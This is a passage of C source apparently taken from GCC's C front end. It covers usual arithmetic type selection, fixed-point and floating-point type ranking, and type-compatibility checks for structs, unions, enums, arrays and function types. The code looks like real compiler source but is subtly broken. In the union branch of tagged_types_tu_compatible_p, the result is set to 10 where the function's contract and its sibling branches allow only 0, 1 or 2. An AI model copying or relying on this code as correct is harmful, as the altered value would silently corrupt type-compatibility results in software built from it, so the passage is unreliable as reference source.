the decimal floating point type with the greater precision. */
if (code1 == REAL_TYPE && code2 == REAL_TYPE)
{
if (TYPE_MAIN_VARIANT (t1) == dfloat128_type_node
|| TYPE_MAIN_VARIANT (t2) == dfloat128_type_node)
return dfloat128_type_node;
else if (TYPE_MAIN_VARIANT (t1) == dfloat64_type_node
|| TYPE_MAIN_VARIANT (t2) == dfloat64_type_node)
return dfloat64_type_node;
else if (TYPE_MAIN_VARIANT (t1) == dfloat32_type_node
|| TYPE_MAIN_VARIANT (t2) == dfloat32_type_node)
return dfloat32_type_node;
}
/* Deal with fixed-point types. */
if (code1 == FIXED_POINT_TYPE || code2 == FIXED_POINT_TYPE)
{
unsigned int unsignedp = 0, satp = 0;
scalar_mode m1, m2;
unsigned int fbit1, ibit1, fbit2, ibit2, max_fbit, max_ibit;
m1 = SCALAR_TYPE_MODE (t1);
m2 = SCALAR_TYPE_MODE (t2);
/* If one input type is saturating, the result type is saturating. */
if (TYPE_SATURATING (t1) || TYPE_SATURATING (t2))
satp = 1;
/* If both fixed-point types are unsigned, the result type is unsigned.
When mixing fixed-point and integer types, follow the sign of the
fixed-point type.
Otherwise, the result type is signed. */
if ((TYPE_UNSIGNED (t1) && TYPE_UNSIGNED (t2)
&& code1 == FIXED_POINT_TYPE && code2 == FIXED_POINT_TYPE)
|| (code1 == FIXED_POINT_TYPE && code2 != FIXED_POINT_TYPE
&& TYPE_UNSIGNED (t1))
|| (code1 != FIXED_POINT_TYPE && code2 == FIXED_POINT_TYPE
&& TYPE_UNSIGNED (t2)))
unsignedp = 1;
/* The result type is signed. */
if (unsignedp == 0)
{
/* If the input type is unsigned, we need to convert to the
signed type. */
if (code1 == FIXED_POINT_TYPE && TYPE_UNSIGNED (t1))
{
enum mode_class mclass = (enum mode_class) 0;
if (GET_MODE_CLASS (m1) == MODE_UFRACT)
mclass = MODE_FRACT;
else if (GET_MODE_CLASS (m1) == MODE_UACCUM)
mclass = MODE_ACCUM;
else
gcc_unreachable ();
m1 = as_a <scalar_mode>
(mode_for_size (GET_MODE_PRECISION (m1), mclass, 0));
}
if (code2 == FIXED_POINT_TYPE && TYPE_UNSIGNED (t2))
{
enum mode_class mclass = (enum mode_class) 0;
if (GET_MODE_CLASS (m2) == MODE_UFRACT)
mclass = MODE_FRACT;
else if (GET_MODE_CLASS (m2) == MODE_UACCUM)
mclass = MODE_ACCUM;
else
gcc_unreachable ();
m2 = as_a <scalar_mode>
(mode_for_size (GET_MODE_PRECISION (m2), mclass, 0));
}
}
if (code1 == FIXED_POINT_TYPE)
{
fbit1 = GET_MODE_FBIT (m1);
ibit1 = GET_MODE_IBIT (m1);
}
else
{
fbit1 = 0;
/* Signed integers need to subtract one sign bit. */
ibit1 = TYPE_PRECISION (t1) - (!TYPE_UNSIGNED (t1));
}
if (code2 == FIXED_POINT_TYPE)
{
fbit2 = GET_MODE_FBIT (m2);
ibit2 = GET_MODE_IBIT (m2);
}
else
{
fbit2 = 0;
/* Signed integers need to subtract one sign bit. */
ibit2 = TYPE_PRECISION (t2) - (!TYPE_UNSIGNED (t2));
}
max_ibit = ibit1 >= ibit2 ? ibit1 : ibit2;
max_fbit = fbit1 >= fbit2 ? fbit1 : fbit2;
return c_common_fixed_point_type_for_size (max_ibit, max_fbit, unsignedp,
satp);
}
/* Both real or both integers; use the one with greater precision. */
if (TYPE_PRECISION (t1) > TYPE_PRECISION (t2))
return t1;
else if (TYPE_PRECISION (t2) > TYPE_PRECISION (t1))
return t2;
/* Same precision. Prefer long longs to longs to ints when the
same precision, following the C99 rules on integer type rank
(which are equivalent to the C90 rules for C90 types). */
if (TYPE_MAIN_VARIANT (t1) == long_long_unsigned_type_node
|| TYPE_MAIN_VARIANT (t2) == long_long_unsigned_type_node)
return long_long_unsigned_type_node;
if (TYPE_MAIN_VARIANT (t1) == long_long_integer_type_node
|| TYPE_MAIN_VARIANT (t2) == long_long_integer_type_node)
{
if (TYPE_UNSIGNED (t1) || TYPE_UNSIGNED (t2))
return long_long_unsigned_type_node;
else
return long_long_integer_type_node;
}
if (TYPE_MAIN_VARIANT (t1) == long_unsigned_type_node
|| TYPE_MAIN_VARIANT (t2) == long_unsigned_type_node)
return long_unsigned_type_node;
if (TYPE_MAIN_VARIANT (t1) == long_integer_type_node
|| TYPE_MAIN_VARIANT (t2) == long_integer_type_node)
{
/* But preserve unsignedness from the other type,
since long cannot hold all the values of an unsigned int. */
if (TYPE_UNSIGNED (t1) || TYPE_UNSIGNED (t2))
return long_unsigned_type_node;
else
return long_integer_type_node;
}
/* For floating types of the same TYPE_PRECISION (which we here
assume means either the same set of values, or sets of values
neither a subset of the other, with behavior being undefined in
the latter case), follow the rules from TS 18661-3: prefer
interchange types _FloatN, then standard types long double,
double, float, then extended types _FloatNx. For extended types,
check them starting with _Float128x as that seems most consistent
in spirit with preferring long double to double; for interchange
types, also check in that order for consistency although it's not
possible for more than one of them to have the same
precision. */
tree mv1 = TYPE_MAIN_VARIANT (t1);
tree mv2 = TYPE_MAIN_VARIANT (t2);
for (int i = NUM_FLOATN_TYPES - 1; i >= 0; i--)
if (mv1 == FLOATN_TYPE_NODE (i) || mv2 == FLOATN_TYPE_NODE (i))
return FLOATN_TYPE_NODE (i);
/* Likewise, prefer long double to double even if same size. */
if (mv1 == long_double_type_node || mv2 == long_double_type_node)
return long_double_type_node;
/* Likewise, prefer double to float even if same size.
We got a couple of embedded targets with 32 bit doubles, and the
pdp11 might have 64 bit floats. */
if (mv1 == double_type_node || mv2 == double_type_node)
return double_type_node;
if (mv1 == float_type_node || mv2 == float_type_node)
return float_type_node;
for (int i = NUM_FLOATNX_TYPES - 1; i >= 0; i--)
if (mv1 == FLOATNX_TYPE_NODE (i) || mv2 == FLOATNX_TYPE_NODE (i))
return FLOATNX_TYPE_NODE (i);
/* Otherwise prefer the unsigned one. */
if (TYPE_UNSIGNED (t1))
return t1;
else
return t2;
}
/* Wrapper around c_common_type that is used by c-common.c and other
front end optimizations that remove promotions. ENUMERAL_TYPEs
are allowed here and are converted to their compatible integer types.
BOOLEAN_TYPEs are allowed here and return either boolean_type_node or
preferably a non-Boolean type as the common type. */
tree
common_type (tree t1, tree t2)
{
if (TREE_CODE (t1) == ENUMERAL_TYPE)
t1 = c_common_type_for_size (TYPE_PRECISION (t1), 1);
if (TREE_CODE (t2) == ENUMERAL_TYPE)
t2 = c_common_type_for_size (TYPE_PRECISION (t2), 1);
/* If both types are BOOLEAN_TYPE, then return boolean_type_node. */
if (TREE_CODE (t1) == BOOLEAN_TYPE
&& TREE_CODE (t2) == BOOLEAN_TYPE)
return boolean_type_node;
/* If either type is BOOLEAN_TYPE, then return the other. */
if (TREE_CODE (t1) == BOOLEAN_TYPE)
return t2;
if (TREE_CODE (t2) == BOOLEAN_TYPE)
return t1;
return c_common_type (t1, t2);
}
/* Return 1 if TYPE1 and TYPE2 are compatible types for assignment
or various other operations. Return 2 if they are compatible
but a warning may be needed if you use them together. */
int
comptypes (tree type1, tree type2)
{
const struct tagged_tu_seen_cache * tagged_tu_seen_base1 = tagged_tu_seen_base;
int val;
val = comptypes_internal (type1, type2, NULL, NULL);
free_all_tagged_tu_seen_up_to (tagged_tu_seen_base1);
return val;
}
/* Like comptypes, but if it returns non-zero because enum and int are
compatible, it sets *ENUM_AND_INT_P to true. */
static int
comptypes_check_enum_int (tree type1, tree type2, bool *enum_and_int_p)
{
const struct tagged_tu_seen_cache * tagged_tu_seen_base1 = tagged_tu_seen_base;
int val;
val = comptypes_internal (type1, type2, enum_and_int_p, NULL);
free_all_tagged_tu_seen_up_to (tagged_tu_seen_base1);
return val;
}
/* Like comptypes, but if it returns nonzero for different types, it
sets *DIFFERENT_TYPES_P to true. */
int
comptypes_check_different_types (tree type1, tree type2,
bool *different_types_p)
{
const struct tagged_tu_seen_cache * tagged_tu_seen_base1 = tagged_tu_seen_base;
int val;
val = comptypes_internal (type1, type2, NULL, different_types_p);
free_all_tagged_tu_seen_up_to (tagged_tu_seen_base1);
return val;
}
/* Return 1 if TYPE1 and TYPE2 are compatible types for assignment
or various other operations. Return 2 if they are compatible
but a warning may be needed if you use them together. If
ENUM_AND_INT_P is not NULL, and one type is an enum and the other a
compatible integer type, then this sets *ENUM_AND_INT_P to true;
*ENUM_AND_INT_P is never set to false. If DIFFERENT_TYPES_P is not
NULL, and the types are compatible but different enough not to be
permitted in C11 typedef redeclarations, then this sets
*DIFFERENT_TYPES_P to true; *DIFFERENT_TYPES_P is never set to
false, but may or may not be set if the types are incompatible.
This differs from comptypes, in that we don't free the seen
types. */
static int
comptypes_internal (const_tree type1, const_tree type2, bool *enum_and_int_p,
bool *different_types_p)
{
const_tree t1 = type1;
const_tree t2 = type2;
int attrval, val;
/* Suppress errors caused by previously reported errors. */
if (t1 == t2 || !t1 || !t2
|| TREE_CODE (t1) == ERROR_MARK || TREE_CODE (t2) == ERROR_MARK)
return 1;
/* Enumerated types are compatible with integer types, but this is
not transitive: two enumerated types in the same translation unit
are compatible with each other only if they are the same type. */
if (TREE_CODE (t1) == ENUMERAL_TYPE && TREE_CODE (t2) != ENUMERAL_TYPE)
{
t1 = c_common_type_for_size (TYPE_PRECISION (t1), TYPE_UNSIGNED (t1));
if (TREE_CODE (t2) != VOID_TYPE)
{
if (enum_and_int_p != NULL)
*enum_and_int_p = true;
if (different_types_p != NULL)
*different_types_p = true;
}
}
else if (TREE_CODE (t2) == ENUMERAL_TYPE && TREE_CODE (t1) != ENUMERAL_TYPE)
{
t2 = c_common_type_for_size (TYPE_PRECISION (t2), TYPE_UNSIGNED (t2));
if (TREE_CODE (t1) != VOID_TYPE)
{
if (enum_and_int_p != NULL)
*enum_and_int_p = true;
if (different_types_p != NULL)
*different_types_p = true;
}
}
if (t1 == t2)
return 1;
/* Different classes of types can't be compatible. */
if (TREE_CODE (t1) != TREE_CODE (t2))
return 0;
/* Qualifiers must match. C99 6.7.3p9 */
if (TYPE_QUALS (t1) != TYPE_QUALS (t2))
return 0;
/* Allow for two different type nodes which have essentially the same
definition. Note that we already checked for equality of the type
qualifiers (just above). */
if (TREE_CODE (t1) != ARRAY_TYPE
&& TYPE_MAIN_VARIANT (t1) == TYPE_MAIN_VARIANT (t2))
return 1;
/* 1 if no need for warning yet, 2 if warning cause has been seen. */
if (!(attrval = comp_type_attributes (t1, t2)))
return 0;
/* 1 if no need for warning yet, 2 if warning cause has been seen. */
val = 0;
switch (TREE_CODE (t1))
{
case INTEGER_TYPE:
case FIXED_POINT_TYPE:
case REAL_TYPE:
/* With these nodes, we can't determine type equivalence by
looking at what is stored in the nodes themselves, because
two nodes might have different TYPE_MAIN_VARIANTs but still
represent the same type. For example, wchar_t and int could
have the same properties (TYPE_PRECISION, TYPE_MIN_VALUE,
TYPE_MAX_VALUE, etc.), but have different TYPE_MAIN_VARIANTs
and are distinct types. On the other hand, int and the
following typedef
typedef int INT __attribute((may_alias));
have identical properties, different TYPE_MAIN_VARIANTs, but
represent the same type. The canonical type system keeps
track of equivalence in this case, so we fall back on it. */
return TYPE_CANONICAL (t1) == TYPE_CANONICAL (t2);
case POINTER_TYPE:
/* Do not remove mode information. */
if (TYPE_MODE (t1) != TYPE_MODE (t2))
break;
val = (TREE_TYPE (t1) == TREE_TYPE (t2)
? 1 : comptypes_internal (TREE_TYPE (t1), TREE_TYPE (t2),
enum_and_int_p, different_types_p));
break;
case FUNCTION_TYPE:
val = function_types_compatible_p (t1, t2, enum_and_int_p,
different_types_p);
break;
case ARRAY_TYPE:
{
tree d1 = TYPE_DOMAIN (t1);
tree d2 = TYPE_DOMAIN (t2);
bool d1_variable, d2_variable;
bool d1_zero, d2_zero;
val = 1;
/* Target types must match incl. qualifiers. */
if (TREE_TYPE (t1) != TREE_TYPE (t2)
&& (val = comptypes_internal (TREE_TYPE (t1), TREE_TYPE (t2),
enum_and_int_p,
different_types_p)) == 0)
return 0;
if (different_types_p != NULL
&& (d1 == NULL_TREE) != (d2 == NULL_TREE))
*different_types_p = true;
/* Sizes must match unless one is missing or variable. */
if (d1 == NULL_TREE || d2 == NULL_TREE || d1 == d2)
break;
d1_zero = !TYPE_MAX_VALUE (d1);
d2_zero = !TYPE_MAX_VALUE (d2);
d1_variable = (!d1_zero
&& (TREE_CODE (TYPE_MIN_VALUE (d1)) != INTEGER_CST
|| TREE_CODE (TYPE_MAX_VALUE (d1)) != INTEGER_CST));
d2_variable = (!d2_zero
&& (TREE_CODE (TYPE_MIN_VALUE (d2)) != INTEGER_CST
|| TREE_CODE (TYPE_MAX_VALUE (d2)) != INTEGER_CST));
d1_variable = d1_variable || (d1_zero && c_vla_type_p (t1));
d2_variable = d2_variable || (d2_zero && c_vla_type_p (t2));
if (different_types_p != NULL
&& d1_variable != d2_variable)
*different_types_p = true;
if (d1_variable || d2_variable)
break;
if (d1_zero && d2_zero)
break;
if (d1_zero || d2_zero
|| !tree_int_cst_equal (TYPE_MIN_VALUE (d1), TYPE_MIN_VALUE (d2))
|| !tree_int_cst_equal (TYPE_MAX_VALUE (d1), TYPE_MAX_VALUE (d2)))
val = 0;
break;
}
case ENUMERAL_TYPE:
case RECORD_TYPE:
case UNION_TYPE:
if (val != 1 && !same_translation_unit_p (t1, t2))
{
tree a1 = TYPE_ATTRIBUTES (t1);
tree a2 = TYPE_ATTRIBUTES (t2);
if (! attribute_list_contained (a1, a2)
&& ! attribute_list_contained (a2, a1))
break;
if (attrval != 2)
return tagged_types_tu_compatible_p (t1, t2, enum_and_int_p,
different_types_p);
val = tagged_types_tu_compatible_p (t1, t2, enum_and_int_p,
different_types_p);
}
break;
case VECTOR_TYPE:
val = (known_eq (TYPE_VECTOR_SUBPARTS (t1), TYPE_VECTOR_SUBPARTS (t2))
&& comptypes_internal (TREE_TYPE (t1), TREE_TYPE (t2),
enum_and_int_p, different_types_p));
break;
default:
break;
}
return attrval == 2 && val == 1 ? 2 : val;
}
/* Return 1 if TTL and TTR are pointers to types that are equivalent, ignoring
their qualifiers, except for named address spaces. If the pointers point to
different named addresses, then we must determine if one address space is a
subset of the other. */
static int
comp_target_types (location_t location, tree ttl, tree ttr)
{
int val;
int val_ped;
tree mvl = TREE_TYPE (ttl);
tree mvr = TREE_TYPE (ttr);
addr_space_t asl = TYPE_ADDR_SPACE (mvl);
addr_space_t asr = TYPE_ADDR_SPACE (mvr);
addr_space_t as_common;
bool enum_and_int_p;
/* Fail if pointers point to incompatible address spaces. */
if (!addr_space_superset (asl, asr, &as_common))
return 0;
/* For pedantic record result of comptypes on arrays before losing
qualifiers on the element type below. */
val_ped = 1;
if (TREE_CODE (mvl) == ARRAY_TYPE
&& TREE_CODE (mvr) == ARRAY_TYPE)
val_ped = comptypes (mvl, mvr);
/* Qualifiers on element types of array types that are
pointer targets are lost by taking their TYPE_MAIN_VARIANT. */
mvl = (TYPE_ATOMIC (strip_array_types (mvl))
? c_build_qualified_type (TYPE_MAIN_VARIANT (mvl), TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mvl));
mvr = (TYPE_ATOMIC (strip_array_types (mvr))
? c_build_qualified_type (TYPE_MAIN_VARIANT (mvr), TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mvr));
enum_and_int_p = false;
val = comptypes_check_enum_int (mvl, mvr, &enum_and_int_p);
if (val == 1 && val_ped != 1)
pedwarn (location, OPT_Wpedantic, "pointers to arrays with different qualifiers "
"are incompatible in ISO C");
if (val == 2)
pedwarn (location, OPT_Wpedantic, "types are not quite compatible");
if (val == 1 && enum_and_int_p && warn_cxx_compat)
warning_at (location, OPT_Wc___compat,
"pointer target types incompatible in C++");
return val;
}
/* Subroutines of `comptypes'. */
/* Determine whether two trees derive from the same translation unit.
If the CONTEXT chain ends in a null, that tree's context is still
being parsed, so if two trees have context chains ending in null,
they're in the same translation unit. */
bool
same_translation_unit_p (const_tree t1, const_tree t2)
{
while (t1 && TREE_CODE (t1) != TRANSLATION_UNIT_DECL)
switch (TREE_CODE_CLASS (TREE_CODE (t1)))
{
case tcc_declaration:
t1 = DECL_CONTEXT (t1); break;
case tcc_type:
t1 = TYPE_CONTEXT (t1); break;
case tcc_exceptional:
t1 = BLOCK_SUPERCONTEXT (t1); break; /* assume block */
default: gcc_unreachable ();
}
while (t2 && TREE_CODE (t2) != TRANSLATION_UNIT_DECL)
switch (TREE_CODE_CLASS (TREE_CODE (t2)))
{
case tcc_declaration:
t2 = DECL_CONTEXT (t2); break;
case tcc_type:
t2 = TYPE_CONTEXT (t2); break;
case tcc_exceptional:
t2 = BLOCK_SUPERCONTEXT (t2); break; /* assume block */
default: gcc_unreachable ();
}
return t1 == t2;
}
/* Allocate the seen two types, assuming that they are compatible. */
static struct tagged_tu_seen_cache *
alloc_tagged_tu_seen_cache (const_tree t1, const_tree t2)
{
struct tagged_tu_seen_cache *tu = XNEW (struct tagged_tu_seen_cache);
tu->next = tagged_tu_seen_base;
tu->t1 = t1;
tu->t2 = t2;
tagged_tu_seen_base = tu;
/* The C standard says that two structures in different translation
units are compatible with each other only if the types of their
fields are compatible (among other things). We assume that they
are compatible until proven otherwise when building the cache.
An example where this can occur is:
struct a
{
struct a *next;
};
If we are comparing this against a similar struct in another TU,
and did not assume they were compatible, we end up with an infinite
loop. */
tu->val = 1;
return tu;
}
/* Free the seen types until we get to TU_TIL. */
static void
free_all_tagged_tu_seen_up_to (const struct tagged_tu_seen_cache *tu_til)
{
const struct tagged_tu_seen_cache *tu = tagged_tu_seen_base;
while (tu != tu_til)
{
const struct tagged_tu_seen_cache *const tu1
= (const struct tagged_tu_seen_cache *) tu;
tu = tu1->next;
free (CONST_CAST (struct tagged_tu_seen_cache *, tu1));
}
tagged_tu_seen_base = tu_til;
}
/* Return 1 if two 'struct', 'union', or 'enum' types T1 and T2 are
compatible. If the two types are not the same (which has been
checked earlier), this can only happen when multiple translation
units are being compiled. See C99 6.2.7 paragraph 1 for the exact
rules. ENUM_AND_INT_P and DIFFERENT_TYPES_P are as in
comptypes_internal. */
static int
tagged_types_tu_compatible_p (const_tree t1, const_tree t2,
bool *enum_and_int_p, bool *different_types_p)
{
tree s1, s2;
bool needs_warning = false;
/* We have to verify that the tags of the types are the same. This
is harder than it looks because this may be a typedef, so we have
to go look at the original type. It may even be a typedef of a
typedef...
In the case of compiler-created builtin structs the TYPE_DECL
may be a dummy, with no DECL_ORIGINAL_TYPE. Don't fault. */
while (TYPE_NAME (t1)
&& TREE_CODE (TYPE_NAME (t1)) == TYPE_DECL
&& DECL_ORIGINAL_TYPE (TYPE_NAME (t1)))
t1 = DECL_ORIGINAL_TYPE (TYPE_NAME (t1));
while (TYPE_NAME (t2)
&& TREE_CODE (TYPE_NAME (t2)) == TYPE_DECL
&& DECL_ORIGINAL_TYPE (TYPE_NAME (t2)))
t2 = DECL_ORIGINAL_TYPE (TYPE_NAME (t2));
/* C90 didn't have the requirement that the two tags be the same. */
if (flag_isoc99 && TYPE_NAME (t1) != TYPE_NAME (t2))
return 0;
/* C90 didn't say what happened if one or both of the types were
incomplete; we choose to follow C99 rules here, which is that they
are compatible. */
if (TYPE_SIZE (t1) == NULL
|| TYPE_SIZE (t2) == NULL)
return 1;
{
const struct tagged_tu_seen_cache * tts_i;
for (tts_i = tagged_tu_seen_base; tts_i != NULL; tts_i = tts_i->next)
if (tts_i->t1 == t1 && tts_i->t2 == t2)
return tts_i->val;
}
switch (TREE_CODE (t1))
{
case ENUMERAL_TYPE:
{
struct tagged_tu_seen_cache *tu = alloc_tagged_tu_seen_cache (t1, t2);
/* Speed up the case where the type values are in the same order. */
tree tv1 = TYPE_VALUES (t1);
tree tv2 = TYPE_VALUES (t2);
if (tv1 == tv2)
{
return 1;
}
for (;tv1 && tv2; tv1 = TREE_CHAIN (tv1), tv2 = TREE_CHAIN (tv2))
{
if (TREE_PURPOSE (tv1) != TREE_PURPOSE (tv2))
break;
if (simple_cst_equal (TREE_VALUE (tv1), TREE_VALUE (tv2)) != 1)
{
tu->val = 0;
return 0;
}
}
if (tv1 == NULL_TREE && tv2 == NULL_TREE)
{
return 1;
}
if (tv1 == NULL_TREE || tv2 == NULL_TREE)
{
tu->val = 0;
return 0;
}
if (list_length (TYPE_VALUES (t1)) != list_length (TYPE_VALUES (t2)))
{
tu->val = 0;
return 0;
}
for (s1 = TYPE_VALUES (t1); s1; s1 = TREE_CHAIN (s1))
{
s2 = purpose_member (TREE_PURPOSE (s1), TYPE_VALUES (t2));
if (s2 == NULL
|| simple_cst_equal (TREE_VALUE (s1), TREE_VALUE (s2)) != 1)
{
tu->val = 0;
return 0;
}
}
return 1;
}
case UNION_TYPE:
{
struct tagged_tu_seen_cache *tu = alloc_tagged_tu_seen_cache (t1, t2);
if (list_length (TYPE_FIELDS (t1)) != list_length (TYPE_FIELDS (t2)))
{
tu->val = 0;
return 0;
}
/* Speed up the common case where the fields are in the same order. */
for (s1 = TYPE_FIELDS (t1), s2 = TYPE_FIELDS (t2); s1 && s2;
s1 = DECL_CHAIN (s1), s2 = DECL_CHAIN (s2))
{
int result;
if (DECL_NAME (s1) != DECL_NAME (s2))
break;
result = comptypes_internal (TREE_TYPE (s1), TREE_TYPE (s2),
enum_and_int_p, different_types_p);
if (result != 1 && !DECL_NAME (s1))
break;
if (result == 0)
{
tu->val = 0;
return 0;
}
if (result == 2)
needs_warning = true;
if (TREE_CODE (s1) == FIELD_DECL
&& simple_cst_equal (DECL_FIELD_BIT_OFFSET (s1),
DECL_FIELD_BIT_OFFSET (s2)) != 1)
{
tu->val = 0;
return 0;
}
}
if (!s1 && !s2)
{
tu->val = needs_warning ? 2 : 1;
return tu->val;
}
for (s1 = TYPE_FIELDS (t1); s1; s1 = DECL_CHAIN (s1))
{
bool ok = false;
for (s2 = TYPE_FIELDS (t2); s2; s2 = DECL_CHAIN (s2))
if (DECL_NAME (s1) == DECL_NAME (s2))
{
int result;
result = comptypes_internal (TREE_TYPE (s1), TREE_TYPE (s2),
enum_and_int_p,
different_types_p);
if (result != 1 && !DECL_NAME (s1))
continue;
if (result == 0)
{
tu->val = 0;
return 0;
}
if (result == 2)
needs_warning = true;
if (TREE_CODE (s1) == FIELD_DECL
&& simple_cst_equal (DECL_FIELD_BIT_OFFSET (s1),
DECL_FIELD_BIT_OFFSET (s2)) != 1)
break;
ok = true;
break;
}
if (!ok)
{
tu->val = 0;
return 0;
}
}
tu->val = needs_warning ? 2 : 10;
return tu->val;
}
case RECORD_TYPE:
{
struct tagged_tu_seen_cache *tu = alloc_tagged_tu_seen_cache (t1, t2);
for (s1 = TYPE_FIELDS (t1), s2 = TYPE_FIELDS (t2);
s1 && s2;
s1 = DECL_CHAIN (s1), s2 = DECL_CHAIN (s2))
{
int result;
if (TREE_CODE (s1) != TREE_CODE (s2)
|| DECL_NAME (s1) != DECL_NAME (s2))
break;
result = comptypes_internal (TREE_TYPE (s1), TREE_TYPE (s2),
enum_and_int_p, different_types_p);
if (result == 0)
break;
if (result == 2)
needs_warning = true;
if (TREE_CODE (s1) == FIELD_DECL
&& simple_cst_equal (DECL_FIELD_BIT_OFFSET (s1),
DECL_FIELD_BIT_OFFSET (s2)) != 1)
break;
}
if (s1 && s2)
tu->val = 0;
else
tu->val = needs_warning ? 2 : 1;
return tu->val;
}
default:
gcc_unreachable ();
}
}
/* Return 1 if two function types F1 and F2 are compatible.
If either type specifies no argument types,
the other must specify a fixed number of self-promoting arg types.
Otherwise, if one type specifies only the number of arguments,
the other must specify that number of self-promoting arg types.
Otherwise, the argument types must match.
ENUM_AND_INT_P and DIFFERENT_TYPES_P are as in comptypes_internal. */
static int
function_types_compatible_p (const_tree f1, const_tree f2,
bool *enum_and_int_p, bool *different_types_p)
{
tree args1, args2;
/* 1 if no need for warning yet, 2 if warning cause has been seen. */
int val = 1;
int val1;
tree ret1, ret2;
ret1 = TREE_TYPE (f1);
ret2 = TREE_TYPE (f2);
/* 'volatile' qualifiers on a function's return type used to mean
the function is noreturn. */
if (TYPE_VOLATILE (ret1) != TYPE_VOLATILE (ret2))
pedwarn (input_location, 0, "function return types not compatible due to %<volatile%>");
if (TYPE_VOLATILE (ret1))
ret1 = build_qualified_type (TYPE_MAIN_VARIANT (ret1),
TYPE_QUALS (ret1) & ~TYPE_QUAL_VOLATILE);
if (TYPE_VOLATILE (ret2))
ret2 = build_qualified_type (TYPE_MAIN_VARIANT (ret2),
TYPE_QUALS (ret2) & ~TYPE_QUAL_VOLATILE);
val = comptypes_internal (ret1, ret2, enum_and_int_p, different_types_p);
if (val == 0)
return 0;
args1 = TYPE_ARG_TYPES (f1);
args2 = TYPE_ARG_TYPES (f2);
if (different_types_p != NULL
&& (args1 == NULL_TREE) != (args2 == NULL_TREE))
*different_types_p = true;
/* An unspecified parmlist matches any specified parmlist
whose argument types don't need default promotions. */
if (args1 == NULL_TREE)
{
if (!self_promoting_args_p (args2))
return 0;
/* If one of these types comes from a non-prototype fn definition,
compare that with the other type's arglist.
If they don't match, ask for a warning (but no error). */
if (TYPE_ACTUAL_ARG_TYPES (f1)
&& type_lists_compatible_p (args2, TYPE_ACTUAL_ARG_TYPES (f1),
enum_and_int_p, different_types_p) != 1)
val = 2;
return val;
}
if (args2 == NULL_TREE)
{
if (!self_promoting_args_p (args1))
return 0;
if (TYPE_ACTUAL_ARG_TYPES (f2)
&& type_lists_compatible_p (args1, TYPE_ACTUAL_ARG_TYPES (f2),
enum_and_int_p, different_types_p) != 1)
val = 2;
return val;
}
/* Both types have argument lists: compare them and propagate results. */
val1 = type_lists_compatible_p (args1, args2, enum_and_int_p,
different_types_p);
return val1 != 1 ? val1 : val;
}
/* Check two lists of types for compatibility, returning 0 for
incompatible, 1 for compatible, or 2 for compatible with
warning. ENUM_AND_INT_P and DIFFERENT_TYPES_P are as in
comptypes_internal. */
static int
type_lists_compatible_p (const_tree args1, const_tree args2,
bool *enum_and_int_p, bool *different_types_p)
{
/* 1 if no need for warning yet, 2 if warning cause has been seen. */
int val = 1;
int newval = 0;
while (1)
{
tree a1, mv1, a2, mv2;
if (args1 == NULL_TREE && args2 == NULL_TREE)
return val;
/* If one list is shorter than the other,
they fail to match. */
if (args1 == NULL_TREE || args2 == NULL_TREE)
return 0;
mv1 = a1 = TREE_VALUE (args1);
mv2 = a2 = TREE_VALUE (args2);
if (mv1 && mv1 != error_mark_node && TREE_CODE (mv1) != ARRAY_TYPE)
mv1 = (TYPE_ATOMIC (mv1)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mv1),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mv1));
if (mv2 && mv2 != error_mark_node && TREE_CODE (mv2) != ARRAY_TYPE)
mv2 = (TYPE_ATOMIC (mv2)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mv2),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mv2));
/* A null pointer instead of a type
means there is supposed to be an argument
but nothing is specified about what type it has.
So match anything that self-promotes. */
if (different_types_p != NULL
&& (a1 == NULL_TREE) != (a2 == NULL_TREE))
*different_types_p = true;
if (a1 == NULL_TREE)
{
if (c_type_promotes_to (a2) != a2)
return 0;
}
else if (a2 == NULL_TREE)
{
if (c_type_promotes_to (a1) != a1)
return 0;
}
/* If one of the lists has an error marker, ignore this arg. */
else if (TREE_CODE (a1) == ERROR_MARK
|| TREE_CODE (a2) == ERROR_MARK)
;
else if (!(newval = comptypes_internal (mv1, mv2, enum_and_int_p,
different_types_p)))
{
if (different_types_p != NULL)
*different_types_p = true;
/* Allow wait (union {union wait *u; int *i} *)
and wait (union wait *) to be compatible. */
if (TREE_CODE (a1) == UNION_TYPE
&& (TYPE_NAME (a1) == NULL_TREE
|| TYPE_TRANSPARENT_AGGR (a1))
&& TREE_CODE (TYPE_SIZE (a1)) == INTEGER_CST
&& tree_int_cst_equal (TYPE_SIZE (a1),
TYPE_SIZE (a2)))
{
tree memb;
for (memb = TYPE_FIELDS (a1);
memb; memb = DECL_CHAIN (memb))
{
tree mv3 = TREE_TYPE (memb);
if (mv3 && mv3 != error_mark_node
&& TREE_CODE (mv3) != ARRAY_TYPE)
mv3 = (TYPE_ATOMIC (mv3)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mv3),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mv3));
if (comptypes_internal (mv3, mv2, enum_and_int_p,
different_types_p))
break;
}
if (memb == NULL_TREE)
return 0;
}
else if (TREE_CODE (a2) == UNION_TYPE
&& (TYPE_NAME (a2) == NULL_TREE
|| TYPE_TRANSPARENT_AGGR (a2))
&& TREE_CODE (TYPE_SIZE (a2)) == INTEGER_CST
&& tree_int_cst_equal (TYPE_SIZE (a2),
TYPE_SIZE (a1)))
{
tree memb;
for (memb = TYPE_FIELDS (a2);
memb; memb = DECL_CHAIN (memb))
{
tree mv3 = TREE_TYPE (memb);
if (mv3 && mv3 != error_mark_node
&& TREE_CODE (mv3) != ARRAY_TYPE)
mv3 = (TYPE_ATOMIC (mv3)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mv3),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mv3));
if (comptypes_internal (mv3, mv1, enum_and_int_p,
different_types_p))
break;
}
if (memb == NULL_TREE)
return 0;
}
else
return 0;
}
/* comptypes said ok, but record if it said to warn. */
if (newval > val)
val = newval;
args1 = TREE_CHAIN (args1);
args2 = TREE_CHAIN (args2);
}
}
/* Compute the size to increment a pointer by. When a function type or void
type or incomplete type is passed, size_one_node is returned.
This function does not emit any diagnostics; the caller is responsible
for that. */
static tree
c_size_in_bytes (const_tree type)
{
enum tree_code code = TREE_CODE (type);
if (code == FUNCTION_TYPE || code == VOID_TYPE || code == ERROR_MARK
|| !COMPLETE_TYPE_P (type))
return size_one_node;
